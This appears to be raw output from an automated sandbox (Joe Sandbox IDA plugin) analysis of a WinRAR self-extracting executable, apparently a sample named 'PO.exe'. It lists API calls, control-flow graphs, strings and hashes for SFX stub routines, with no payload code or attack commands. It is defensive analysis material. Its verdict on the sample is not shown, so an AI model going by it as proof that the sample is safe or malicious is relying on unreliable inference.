20700->20701 20703 c809e1 ShowWindow 20700->20703 20704 c80d02 3 API calls 20701->20704 20706 c80a56 20702->20706 20707 c80a4b 20702->20707 20703->20701 20705 c809ff 20704->20705 20705->20702 20709 c80a12 GetExitCodeProcess 20705->20709 20706->20697 20710 c80acd ShowWindow 20706->20710 20724 c76fa3 CompareStringW 20707->20724 20709->20702 20711 c80a25 20709->20711 20710->20697 20711->20702 20713->20669 20714->20669 20715->20691 20717 c72eca 20716->20717 20718 c72ee6 GetFullPathNameW 20717->20718 20723 c72f35 20717->20723 20719 c72f03 20718->20719 20720 c73283 2 API calls 20719->20720 20719->20723 20721 c72f16 20720->20721 20722 c72f1a GetFullPathNameW 20721->20722 20721->20723 20722->20723 20723->20699 20724->20706

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00C75EDC: GetModuleHandleW.KERNEL32 ref: 00C75EF4
                          • Part of subcall function 00C75EDC: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C75F0C
                          • Part of subcall function 00C75EDC: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C75F2F
                          • Part of subcall function 00C7DAC4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00C7DACC
                          • Part of subcall function 00C7DF6C: OleInitialize.OLE32(00000000), ref: 00C7DF85
                          • Part of subcall function 00C7DF6C: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C7DFBC
                          • Part of subcall function 00C7DF6C: SHGetMalloc.SHELL32(00CB86E0), ref: 00C7DFC6
                          • Part of subcall function 00C76BC0: GetCPInfo.KERNEL32(00000000,?), ref: 00C76BD1
                          • Part of subcall function 00C76BC0: IsDBCSLeadByte.KERNEL32(00000000), ref: 00C76BE5
                        • GetCommandLineW.KERNEL32 ref: 00C80FD7
                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00C80FFE
                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00C8100F
                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00C81049
                          • Part of subcall function 00C80CA3: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00C80CB9
                          • Part of subcall function 00C80CA3: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C80CF5
                        • CloseHandle.KERNEL32(00000000), ref: 00C81052
                        • GetModuleFileNameW.KERNEL32(00000000,00CCDF58,00000800), ref: 00C8106D
                        • SetEnvironmentVariableW.KERNEL32(sfxname,00CCDF58), ref: 00C8107F
                        • GetLocalTime.KERNEL32(?), ref: 00C81086
                        • _swprintf.LIBCMT ref: 00C810C5
                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00C810D7
                        • GetModuleHandleW.KERNEL32(00000000), ref: 00C810DA
                        • LoadIconW.USER32(00000000,00000064), ref: 00C810F1
                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0000EA13,00000000), ref: 00C81142
                        • Sleep.KERNELBASE(?), ref: 00C81170
                        • DeleteObject.GDI32 ref: 00C811AF
                        • DeleteObject.GDI32(?), ref: 00C811BB
                          • Part of subcall function 00C7F798: CharUpperW.USER32(?,?,?,?,00001000), ref: 00C7F7F0
                          • Part of subcall function 00C7F798: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 00C7F817
                        • CloseHandle.KERNEL32 ref: 00C811FA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                        • API String ID: 985665271-2656992072
                        • Opcode ID: ea45249d88d196b6b0943264d4f8ae2755d2e687ab71dc5690b9646c32a90f08
                        • Instruction ID: 81702b4468e4943055be197ad416bb721fa1f837f0ff8dd3c14bdb7b23add116
                        • Opcode Fuzzy Hash: ea45249d88d196b6b0943264d4f8ae2755d2e687ab71dc5690b9646c32a90f08
                        • Instruction Fuzzy Hash: F561F171500240ABD720BBB1EC8AF2F3BECEB48709F08452EFA45A31A1DB748949D765

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 511 c7db06-c7db21 FindResourceW 512 c7db27-c7db39 SizeofResource 511->512 513 c7dbfc-c7dbfe 511->513 514 c7db3b-c7db4a LoadResource 512->514 515 c7db59-c7db5b 512->515 514->515 516 c7db4c-c7db57 LockResource 514->516 517 c7dbfb 515->517 516->515 518 c7db60-c7db75 GlobalAlloc 516->518 517->513 519 c7db77-c7db80 GlobalLock 518->519 520 c7dbf5-c7dbfa 518->520 521 c7db82-c7dba0 call c83410 519->521 522 c7dbee-c7dbef GlobalFree 519->522 520->517 526 c7dbe7-c7dbe8 GlobalUnlock 521->526 527 c7dba2-c7dbba call c7da9b 521->527 522->520 526->522 527->526 531 c7dbbc-c7dbc4 527->531 532 c7dbc6-c7dbda GdipCreateHBITMAPFromBitmap 531->532 533 c7dbdf-c7dbe3 531->533 532->533 534 c7dbdc 532->534 533->526 534->533
                        APIs
                        • FindResourceW.KERNEL32(00000066,PNG,?,?,00C7E98C,00000066), ref: 00C7DB17
                        • SizeofResource.KERNEL32(00000000,75FD5780,?,?,00C7E98C,00000066), ref: 00C7DB2F
                        • LoadResource.KERNEL32(00000000,?,?,00C7E98C,00000066), ref: 00C7DB42
                        • LockResource.KERNEL32(00000000,?,?,00C7E98C,00000066), ref: 00C7DB4D
                        • GlobalAlloc.KERNEL32(00000002,00000000,00000000,?,?,?,00C7E98C,00000066), ref: 00C7DB6B
                        • GlobalLock.KERNEL32(00000000,?,?,?,00C7E98C,00000066), ref: 00C7DB78
                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00C7DBD3
                        • GlobalUnlock.KERNEL32(00000000), ref: 00C7DBE8
                        • GlobalFree.KERNEL32(00000000), ref: 00C7DBEF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                        • String ID: PNG
                        • API String ID: 4097654274-364855578
                        • Opcode ID: e6da1ff9d5ce37f67b726353ba613ba838278dccac3305ce6539afd8d3698d87
                        • Instruction ID: acc6703b455ab6abfda90d59b564e50c6a2e8cc0297f2342dbca8e5ff9225cc8
                        • Opcode Fuzzy Hash: e6da1ff9d5ce37f67b726353ba613ba838278dccac3305ce6539afd8d3698d87
                        • Instruction Fuzzy Hash: D8215C71604702ABC7229F21DC8DF2F7FBCEF45794F158529F95A82260DB21D804DBA1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: __allrem$H_prolog
                        • String ID: AES-0017$PO.exe$z01$zip$zipx$zx01
                        • API String ID: 1819648897-3515524225
                        • Opcode ID: 11f329e0bbae895b3ebc531fe8df1f5b1f6fc6146eb798ef68b9e6d2c0d3e904
                        • Instruction ID: 4653d8d2ad50c68d37329a2ba37a11e6bca9d7d3232feb7dfe180cfd2deb506c
                        • Opcode Fuzzy Hash: 11f329e0bbae895b3ebc531fe8df1f5b1f6fc6146eb798ef68b9e6d2c0d3e904
                        • Instruction Fuzzy Hash: 4C82BD71648209AFDB24DF64DC95BAD37A8FB48304F088369FD19972A2DB309E44EB51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1322 c7286d-c72893 call c81bc0 1325 c72907-c72910 FindNextFileW 1322->1325 1326 c72895-c728a8 FindFirstFileW 1322->1326 1329 c72926-c72928 1325->1329 1330 c72912-c72920 GetLastError 1325->1330 1327 c7292e-c729d7 call c75c1f call c73669 call c76664 * 3 1326->1327 1328 c728ae-c728c9 call c73283 1326->1328 1331 c729dc-c729ef 1327->1331 1337 c728e0-c728e9 GetLastError 1328->1337 1338 c728cb-c728de FindFirstFileW 1328->1338 1329->1327 1329->1331 1330->1329 1340 c728eb-c728ee 1337->1340 1341 c728fa 1337->1341 1338->1327 1338->1337 1340->1341 1343 c728f0-c728f3 1340->1343 1344 c728fc-c72902 1341->1344 1343->1341 1346 c728f5-c728f8 1343->1346 1344->1331 1346->1344
                        APIs
                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00C72768,000000FF,?,?), ref: 00C728A2
                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00C72768,000000FF,?,?), ref: 00C728D8
                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C72768,000000FF,?,?), ref: 00C728E0
                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,00C72768,000000FF,?,?), ref: 00C72908
                        • GetLastError.KERNEL32(?,?,?,?,00C72768,000000FF,?,?), ref: 00C72914
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: FileFind$ErrorFirstLast$Next
                        • String ID:
                        • API String ID: 869497890-0
                        • Opcode ID: 07f80f89902ab124e4ce07108be4518088ac22a83d6316c4b325235358545392
                        • Instruction ID: f2463819b40231032d47b4cd915bf685e8342590089821f3626bb5dffab35c28
                        • Opcode Fuzzy Hash: 07f80f89902ab124e4ce07108be4518088ac22a83d6316c4b325235358545392
                        • Instruction Fuzzy Hash: 88416276604745AFC325EF28C884ADAF7E8BF48350F048A1AF5EDD3240D735A9549B92
                        APIs
                        • GetCurrentProcess.KERNEL32(?,?,00C89789,?,00C9C7E0,0000000C,00C898E0,?,00000002,00000000), ref: 00C897D4
                        • TerminateProcess.KERNEL32(00000000,?,00C89789,?,00C9C7E0,0000000C,00C898E0,?,00000002,00000000), ref: 00C897DB
                        • ExitProcess.KERNEL32 ref: 00C897ED
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: afb226c309ed5716f031c103579abca322be769b98f9453a004393f5e7583801
                        • Instruction ID: 9aa8c947e548766e4dd9ec8814ee88a41e9a726f06a41cad754c051db4d11d2e
                        • Opcode Fuzzy Hash: afb226c309ed5716f031c103579abca322be769b98f9453a004393f5e7583801
                        • Instruction Fuzzy Hash: D3E0B631110908AFCF127F64DD4EB9C3B69EF41B45F540015F8199A121CB36DD92DB94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID:
                        • String ID: c
                        • API String ID: 0-112844655
                        • Opcode ID: cb4b50fe8f27baf8ff3018e6d6b137e90a8b8395b0e35ce05709abd0bd06d736
                        • Instruction ID: 01f9f3a65e269f6320fce58826bc936c79aad344b310d00484c1b1ef22439c71
                        • Opcode Fuzzy Hash: cb4b50fe8f27baf8ff3018e6d6b137e90a8b8395b0e35ce05709abd0bd06d736
                        • Instruction Fuzzy Hash: 2BE15771A083858FC728DF28D480A6ABBE1FBC9718F10892DE59A87351D731E946CF52
                        APIs
                        • __EH_prolog.LIBCMT ref: 00C7EA18
                          • Part of subcall function 00C71180: GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
                          • Part of subcall function 00C71180: SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: H_prologItemTextWindow
                        • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                        • API String ID: 810644672-3472986185
                        • Opcode ID: e5b0664215c3a377323e0aeb746abe12eb57d917b5703050db049055258c7011
                        • Instruction ID: b8966657ddb45425f13014691dec2ae1b1540c290bff4b1e3155313fb1fe1136
                        • Opcode Fuzzy Hash: e5b0664215c3a377323e0aeb746abe12eb57d917b5703050db049055258c7011
                        • Instruction Fuzzy Hash: 92420771940344BFEB21AF64DC8AFBF3B6CAB05704F1481A9F619A60E1CB744E49DB61

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 256 c75edc-c75efe call c81bc0 GetModuleHandleW 259 c75f51-c761b8 256->259 260 c75f00-c75f17 GetProcAddress 256->260 263 c76286-c762b7 GetModuleFileNameW call c735ae call c75c1f 259->263 264 c761be-c761c9 call c89307 259->264 261 c75f29-c75f33 GetProcAddress 260->261 262 c75f19-c75f26 260->262 261->259 265 c75f35-c75f4c 261->265 262->261 276 c762b9-c762c3 call c729f2 263->276 264->263 272 c761cf-c761fc GetModuleFileNameW CreateFileW 264->272 265->259 274 c761fe-c7620c SetFilePointer 272->274 275 c7627a-c76281 CloseHandle 272->275 274->275 277 c7620e-c7622b ReadFile 274->277 275->263 282 c762c5-c762c9 call c75e92 276->282 283 c762d0 276->283 277->275 278 c7622d-c76252 277->278 280 c7626f-c76278 call c759d0 278->280 280->275 291 c76254-c7626e call c75e92 280->291 288 c762ce 282->288 286 c762d2-c762d4 283->286 289 c762f6-c76318 call c73669 GetFileAttributesW 286->289 290 c762d6-c762f4 CompareStringW 286->290 288->286 293 c7631a-c7631e 289->293 298 c76322 289->298 290->289 290->293 291->280 293->276 297 c76320 293->297 299 c76326-c7632b 297->299 298->299 300 c7635f-c76361 299->300 301 c7632d 299->301 302 c76367-c7637e call c735f8 call c729f2 300->302 303 c7646e-c76478 300->303 304 c7632f-c76351 call c73669 GetFileAttributesW 301->304 314 c763e6-c76419 call c736d0 AllocConsole 302->314 315 c76380-c763e1 call c75e92 * 2 call c73fb9 call c736d0 call c73fb9 call c7dc01 302->315 309 c76353-c76357 304->309 310 c7635b 304->310 309->304 312 c76359 309->312 310->300 312->300 320 c76466-c76468 ExitProcess 314->320 321 c7641b-c76460 GetCurrentProcessId AttachConsole call c86e03 GetStdHandle WriteConsoleW Sleep FreeConsole 314->321 315->320 321->320
                        APIs
                        • GetModuleHandleW.KERNEL32 ref: 00C75EF4
                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C75F0C
                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C75F2F
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C761DA
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C761F2
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C76204
                        • ReadFile.KERNEL32(00000000,?,00007FFE,00C954C8,00000000), ref: 00C76223
                        • CloseHandle.KERNEL32(00000000), ref: 00C7627B
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C76291
                        • CompareStringW.KERNEL32(00000400,00001001,00C95514,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00C762EB
                        • GetFileAttributesW.KERNELBASE(?,?,00C954E0,00000800,?,00000000,?,00000800), ref: 00C76314
                        • GetFileAttributesW.KERNEL32(?,?,00C955A0,00000800), ref: 00C7634D
                          • Part of subcall function 00C75E92: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C75EAD
                          • Part of subcall function 00C75E92: LoadLibraryW.KERNELBASE(?,?,00C74C54,Crypt32.dll,?,00C74CD6,?,00C74CBA,?,?,?,?), ref: 00C75ECF
                        • _swprintf.LIBCMT ref: 00C763BD
                        • _swprintf.LIBCMT ref: 00C76409
                          • Part of subcall function 00C736D0: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C736E3
                        • AllocConsole.KERNEL32 ref: 00C76411
                        • GetCurrentProcessId.KERNEL32 ref: 00C7641B
                        • AttachConsole.KERNEL32(00000000), ref: 00C76422
                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00C76448
                        • WriteConsoleW.KERNEL32(00000000), ref: 00C7644F
                        • Sleep.KERNEL32(00002710), ref: 00C7645A
                        • FreeConsole.KERNEL32 ref: 00C76460
                        • ExitProcess.KERNEL32 ref: 00C76468
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                        • API String ID: 1201351596-3298887752
                        • Opcode ID: de79763ace13a5f6bfa697af8ecd9abc63a56b7dfa2fdcf86e4a0c57a4c296ad
                        • Instruction ID: c69c68500d0e07a2613241fa8d4420a284de8bd9a81ff8a77c8a4dcdd58fe6c0
                        • Opcode Fuzzy Hash: de79763ace13a5f6bfa697af8ecd9abc63a56b7dfa2fdcf86e4a0c57a4c296ad
                        • Instruction Fuzzy Hash: 4CD172F1548B809FDF32DF60C84DB9FBBE8AB84704F50491DF1899A291C7B08649DB66

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 403 c73d4b-c73dc5 call c73702 GetWindowRect GetClientRect 406 c73e66-c73e6e 403->406 407 c73dcb-c73dd3 403->407 408 c73e70-c73ea2 GetWindowTextW call c73793 SetWindowTextW 406->408 409 c73ea8-c73ec3 GetSystemMetrics GetWindow 406->409 407->409 410 c73dd9-c73e22 407->410 408->409 412 c73fa1-c73fa3 409->412 413 c73e26-c73e28 410->413 414 c73e24 410->414 415 c73fa9-c73fb3 412->415 416 c73ec8-c73ece 412->416 418 c73e2c-c73e62 GetWindowLongW GetWindowRect 413->418 419 c73e2a 413->419 414->413 416->415 420 c73ed4-c73eec GetWindowTextW 416->420 418->406 419->418 421 c73f13-c73f18 420->421 422 c73eee-c73f0d call c73793 SetWindowTextW 420->422 425 c73f8f-c73f9e GetWindow 421->425 426 c73f1a-c73f88 GetWindowRect 421->426 422->421 425->415 428 c73fa0 425->428 426->425 428->412
                        APIs
                          • Part of subcall function 00C73702: _wcschr.LIBVCRUNTIME ref: 00C73731
                        • GetWindowRect.USER32(?,?), ref: 00C73D82
                        • GetClientRect.USER32(?,?), ref: 00C73D8E
                        • GetWindowLongW.USER32(?,000000F0), ref: 00C73E2F
                        • GetWindowRect.USER32(?,?), ref: 00C73E5C
                        • GetWindowTextW.USER32(?,?,00000400), ref: 00C73E7B
                        • SetWindowTextW.USER32(?,?), ref: 00C73EA2
                        • GetSystemMetrics.USER32(00000008), ref: 00C73EAA
                        • GetWindow.USER32(?,00000005), ref: 00C73EB5
                        • GetWindowTextW.USER32(00000000,?,00000400), ref: 00C73EE0
                        • SetWindowTextW.USER32(00000000,00000000), ref: 00C73F0D
                        • GetWindowRect.USER32(00000000,?), ref: 00C73F20
                        • GetWindow.USER32(00000000,00000002), ref: 00C73F92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                        • String ID: d
                        • API String ID: 4134264131-2564639436
                        • Opcode ID: db1d8480a6e9677689213555f56e0006a0f6ae4236825986c9f4dc9c12a5b9c7
                        • Instruction ID: c0635b4a8222d0c51751fbce6d7675fe8e236090c4087662271300623cdec9cc
                        • Opcode Fuzzy Hash: db1d8480a6e9677689213555f56e0006a0f6ae4236825986c9f4dc9c12a5b9c7
                        • Instruction Fuzzy Hash: DD618CB2108341AFD310DB69DD89F6FBBE9FBC9314F05492EF585D2290C674EA058B52

                        Control-flow Graph

                        APIs
                        • GetDlgItem.USER32(00000068,00CCEF80), ref: 00C805E3
                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00C7E199,00000001,?,?,00C7EA02,00C96160,00CCEF80), ref: 00C8060E
                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C8061D
                        • SendMessageW.USER32(00000000,000000C2,00000000,00C95294), ref: 00C80627
                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C8063D
                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00C80653
                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C80693
                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00C8069D
                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00C806AC
                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00C806CF
                        • SendMessageW.USER32(00000000,000000C2,00000000,00C960E8), ref: 00C806DA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                        • Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd
                        Similarity
                        • API ID: MessageSend$ItemShowWindow
                        • String ID: \
                        • API String ID: 1207805008-2967466578
                        • Opcode ID: f216a0fce3808111d524e802f4c44a6b6580acbc39425a36c2c9ac9067556c41
                        • Instruction ID: 2286d4497aeccce1e72eea5a1f5c8e33c351ee9bd9871b41d611dd4e2014a1c8
                        • Opcode Fuzzy Hash: f216a0fce3808111d524e802f4c44a6b6580acbc39425a36c2c9ac9067556c41
